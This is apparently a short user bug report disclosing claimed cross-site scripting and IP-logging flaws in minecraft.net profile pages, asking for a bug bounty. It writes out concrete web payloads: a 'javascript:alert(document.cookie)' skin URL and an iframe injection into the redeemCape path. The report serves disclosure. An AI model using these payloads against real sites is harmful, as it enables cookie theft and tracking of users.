dangerous vulnerabilities (xss/ip logger)

hello, i found a bug in setting skin (img tag) and xss
links:
https://my.minecraft.net/profile/skin/remote?url=https://techcrunch.com/wp-content/uploads/2015/08/safe_image.gif

https://my.minecraft.net/profile/skin/remote?url=javascript:alert(document.cookie);

(the picture can be an ip logger)

https://minecraft.net/en-us/profile/redeemCape/<iframe src=javascript:alert(document.cookie)>

 it would be nice if i received bug bounty